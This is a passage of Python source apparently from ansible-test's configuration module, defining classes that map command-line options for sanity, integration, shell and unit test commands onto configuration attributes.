            # a ControllerConfig target is a stand-in for the controller itself
            target_type = type(self.controller)

        return target_type
class TestConfig(EnvironmentConfig):
    """Configuration common to all test commands."""

    def __init__(self, args: t.Any, command: str) -> None:
        super().__init__(args, command)

        self.coverage: bool = args.coverage
        self.coverage_check: bool = args.coverage_check
        self.include: list[str] = args.include or []
        self.exclude: list[str] = args.exclude or []
        self.require: list[str] = args.require or []

        # change-detection options
        self.changed: bool = args.changed
        self.tracked: bool = args.tracked
        self.untracked: bool = args.untracked
        self.committed: bool = args.committed
        self.staged: bool = args.staged
        self.unstaged: bool = args.unstaged
        self.changed_from: str = args.changed_from
        self.changed_path: list[str] = args.changed_path
        self.base_branch: str = args.base_branch

        # getattr() defaults cover commands that do not expose these options
        self.lint: bool = getattr(args, 'lint', False)
        self.junit: bool = getattr(args, 'junit', False)
        self.failure_ok: bool = getattr(args, 'failure_ok', False)

        self.metadata = Metadata.from_file(args.metadata) if args.metadata else Metadata()
        self.metadata_path: t.Optional[str] = None

        # coverage checking requires coverage collection to be enabled
        if self.coverage_check:
            self.coverage = True

        def metadata_callback(payload_config: PayloadConfig) -> None:
            """Add the metadata file to the payload file list."""
            config = self

            files = payload_config.files

            if config.metadata_path:
                files.append((os.path.abspath(config.metadata_path), config.metadata_path))

        data_context().register_payload_callback(metadata_callback)
class ShellConfig(EnvironmentConfig):
    """Configuration for the shell command."""

    def __init__(self, args: t.Any) -> None:
        super().__init__(args, 'shell')

        self.cmd: list[str] = args.cmd
        self.raw: bool = args.raw
        self.check_layout = self.delegate  # allow shell to be used without a valid layout as long as no delegation is required
        self.interactive = sys.stdin.isatty() and not args.cmd  # delegation should only be interactive when stdin is a TTY and no command was given
        self.export: t.Optional[str] = args.export
        # always route display output to stderr so command output on stdout stays clean
        self.display_stderr = True
class SanityConfig(TestConfig):
    """Configuration for the sanity command."""

    def __init__(self, args: t.Any) -> None:
        super().__init__(args, 'sanity')

        self.test: list[str] = args.test
        self.skip_test: list[str] = args.skip_test
        self.list_tests: bool = args.list_tests
        self.allow_disabled: bool = args.allow_disabled
        self.enable_optional_errors: bool = args.enable_optional_errors
        self.prime_venvs: bool = args.prime_venvs

        # when linting or listing tests, display output presumably moves to stderr so
        # stdout carries only the machine-readable results — confirm against Display usage
        self.display_stderr = self.lint or self.list_tests
class IntegrationConfig(TestConfig):
    """Configuration for the integration command."""

    def __init__(self, args: t.Any, command: str) -> None:
        super().__init__(args, command)

        self.start_at: str = args.start_at
        self.start_at_task: str = args.start_at_task
        self.allow_destructive: bool = args.allow_destructive
        self.allow_root: bool = args.allow_root
        self.allow_disabled: bool = args.allow_disabled
        self.allow_unstable: bool = args.allow_unstable
        self.allow_unstable_changed: bool = args.allow_unstable_changed
        self.allow_unsupported: bool = args.allow_unsupported
        self.retry_on_error: bool = args.retry_on_error
        self.continue_on_error: bool = args.continue_on_error
        self.debug_strategy: bool = args.debug_strategy
        self.changed_all_target: str = args.changed_all_target
        self.changed_all_mode: str = args.changed_all_mode
        self.list_targets: bool = args.list_targets
        self.tags = args.tags
        self.skip_tags = args.skip_tags
        self.diff = args.diff
        self.no_temp_workdir: bool = args.no_temp_workdir
        self.no_temp_unicode: bool = args.no_temp_unicode

        if self.list_targets:
            # listing targets should not run anything; emit the list on stdout only
            self.explain = True
            self.display_stderr = True

    def get_ansible_config(self) -> str:
        """Return the path to the Ansible config for the given config."""
        ansible_config_relative_path = os.path.join(data_context().content.integration_path, '%s.cfg' % self.command)
        ansible_config_path = os.path.join(data_context().content.root, ansible_config_relative_path)

        if not os.path.exists(ansible_config_path):
            # use the default empty configuration unless one has been provided
            ansible_config_path = super().get_ansible_config()

        return ansible_config_path
# Type variable bound to IntegrationConfig, for helpers generic over integration command configs.
TIntegrationConfig = t.TypeVar('TIntegrationConfig', bound=IntegrationConfig)
class PosixIntegrationConfig(IntegrationConfig):
    """Configuration for the posix integration command."""

    def __init__(self, args: t.Any) -> None:
        super().__init__(args, 'integration')


class WindowsIntegrationConfig(IntegrationConfig):
    """Configuration for the windows integration command."""

    def __init__(self, args: t.Any) -> None:
        super().__init__(args, 'windows-integration')


class NetworkIntegrationConfig(IntegrationConfig):
    """Configuration for the network integration command."""

    def __init__(self, args: t.Any) -> None:
        super().__init__(args, 'network-integration')

        self.testcase: str = args.testcase  # limit the run to a single named test case
class UnitsConfig(TestConfig):
    """Configuration for the units command."""

    def __init__(self, args: t.Any) -> None:
        super().__init__(args, 'units')

        self.collect_only: bool = args.collect_only
        self.num_workers: int = args.num_workers

        self.requirements_mode: str = getattr(args, 'requirements_mode', '')

        # the mode can force requirements handling on ('only') or off ('skip');
        # any other value leaves the inherited setting untouched
        mode = self.requirements_mode

        if mode == 'only':
            self.requirements = True
        elif mode == 'skip':
            self.requirements = False
| 12,131
|
Python
|
.py
| 255
| 39.341176
| 148
| 0.662818
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|